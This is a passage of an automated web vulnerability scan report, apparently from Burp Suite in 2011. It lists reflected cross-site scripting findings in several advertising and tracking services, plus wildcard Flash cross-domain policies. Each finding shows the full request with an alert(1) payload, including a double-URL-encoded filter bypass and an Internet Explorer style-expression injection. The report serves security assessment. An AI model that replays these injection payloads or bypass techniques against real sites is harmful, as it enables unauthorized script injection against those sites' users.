GET /submit?url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity4e4de"style%3d"x%3aexpression(alert(1))"0d3e962a0e4&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da; cmf_i=309046094e1443cb1cc136.64488011; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 48738
Date: Tue, 19 Jul 2011 14:29:12 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...
<input type="hidden" name="url" value="http://www.factset.com/products/privateequity4e4de"style="x:expression(alert(1))"0d3e962a0e4" />
...[SNIP]...

4.144. http://a.collective-media.net/cmadj/q1.q.boston/be_bus [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3771'%3balert(1)//8c917a196fd was submitted in the cli cookie. This input was echoed as c3771';alert(1)//8c917a196fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_bus;sz=160x600;net=q1;ord=1807584008;ord1=317259;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cc3771'%3balert(1)//8c917a196fd; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:32 GMT
Content-Length: 7241
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10100252408_1311108272","http://ad.doubleclick.net/adj/q1.q.boston/be_bus;net=q1;u=,q1-10100252408_1311108272,11fda490648f83cc3771';alert(1)//8c917a196fd,jobs,;;cmw=owl;sz=160x600;net=q1;ord1=317259;contx=jobs;dc=w;btg=;ord=1807584008?","160","600",false);</scr'+'ipt>
...[SNIP]...

4.145. http://a.collective-media.net/cmadj/q1.q.boston/be_home [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/be_home

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7628e'%3balert(1)//4dbde60b8a6 was submitted in the cli cookie. This input was echoed as 7628e';alert(1)//4dbde60b8a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/be_home;sz=728x90;net=q1;ord=84105094;ord1=58867;cmpgurl=http%253A//boston.com/? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: cli=11fda490648f83c7628e'%3balert(1)//4dbde60b8a6; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:42:38 GMT
Content-Length: 7652
Connection: close
Set-Cookie: exdp=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: ibvr=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: targ=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT
Set-Cookie: brlg=1; domain=collective-media.net; path=/; expires=Tue, 26-Jul-2011 20:42:38 GMT

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10116970907_1311108158","http://ad.doubleclick.net/adj/q1.q.boston/be_home;net=q1;u=,q1-10116970907_1311108158,11fda490648f83c7628e';alert(1)//4dbde60b8a6,ent,;;cmw=owl;sz=728x90;net=q1;ord1=58867;contx=ent;dc=w;btg=;ord=84105094?","728","90",false);</scr'+'ipt>
...[SNIP]...

4.146. http://a.collective-media.net/cmadj/q1.q.boston/bus [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.boston/bus

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab145'%3balert(1)//cf264ed780e was submitted in the cli cookie. This input was echoed as ab145';alert(1)//cf264ed780e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.boston/bus;sz=300x250;net=q1;ord=927603973;ord1=555040;cmpgurl=http%253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html%253Fp1%253DNews_links? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: cli=11fda490648f83cab145'%3balert(1)//cf264ed780e; JY57=3nZdpLNTnOx_GxLJAj3spE9E0bgHPerU2QhUGIlEy5qaRn-HpnhK9pQ; dc=dc; apnx=1; nadp=1; blue=1; qcdp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:44:17 GMT
Content-Length: 7237
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-10320442410_1311108257","http://ad.doubleclick.net/adj/q1.q.boston/bus;net=q1;u=,q1-10320442410_1311108257,11fda490648f83cab145';alert(1)//cf264ed780e,jobs,;;cmw=owl;sz=300x250;net=q1;ord1=555040;contx=jobs;dc=w;btg=;ord=927603973?","300","250",false);</scr'+'ipt>
...[SNIP]...

4.147. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 816eb<script>alert(1)</script>740fa5f17ad was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Tue, 19 Jul 2011 14:26:44 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==816eb<script>alert(1)</script>740fa5f17ad
userid:
</div>
...[SNIP]...

4.148. http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2aa"><script>alert(1)</script>9c3df17f431 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1928
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:46 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5994e2aa"><script>alert(1)</script>9c3df17f431&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.149. http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26b2"><script>alert(1)</script>0ad41bbfab3 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1584
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:40 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599c26b2"><script>alert(1)</script>0ad41bbfab3&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.150. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228 [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a0b1"><script>alert(1)</script>b355aa58d45 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606228?t=1311108254581&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tag.admeld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: meld_sess=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45; __qca=P0-1593807240-1305111258024; D41U=3jJQGUe0Mr1_sOR6QlbZNwyD3LjZHCydqkKN1RXQ0AEdL95ZdcIpbDw

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1582
Content-Type: text/html
Date: Tue, 19 Jul 2011 20:44:31 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<script type="text/javascript">
document.write
...[SNIP]...
<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd5998a0b1"><script>alert(1)</script>b355aa58d45&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel">
...[SNIP]...

4.151. http://www.clickmanage.com/events/clickevent.aspx [u parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /events/clickevent.aspx

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792 was submitted in the u parameter. This input was echoed as ae136'style='x:expression(alert(1))'26493d2e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the u request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_softwareae136%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252726493d2e792&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 19 Jul 2011 14:20:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: policyref="http://www.clickmanage.com/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792
Set-Cookie: uid=21367747-2c53-4cc6-a391-4d75cc92d57b; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Set-Cookie: cp=10332,634466676322687500,4,1044996461,599266080000000000,0*|; expires=Wed, 18-Jul-2012 14:20:32 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 262

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&amp;trm=issue_tracking_softwareae136'style='x:expression(alert(1))'26493d2e792'>
...[SNIP]...

5. Flash cross-domain policy  previous  next
There are 79 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://0.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://0.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 0.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.2. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 19 Jul 2011 14:31:42 GMT
Expires: Tue, 19 Jul 2011 14:36:42 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.3. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 13:14:23 GMT
Accept-Ranges: bytes
Date: Tue, 19 Jul 2011 20:42:35 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>

5.4. http://a.netmng.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.netmng.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:07 GMT
Server: Apache/2.2.9
Last-Modified: Mon, 13 Dec 2010 13:30:04 GMT
ETag: "18273e-6a-4974ab3a2af00"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.5. http://a.ok.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.ok.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

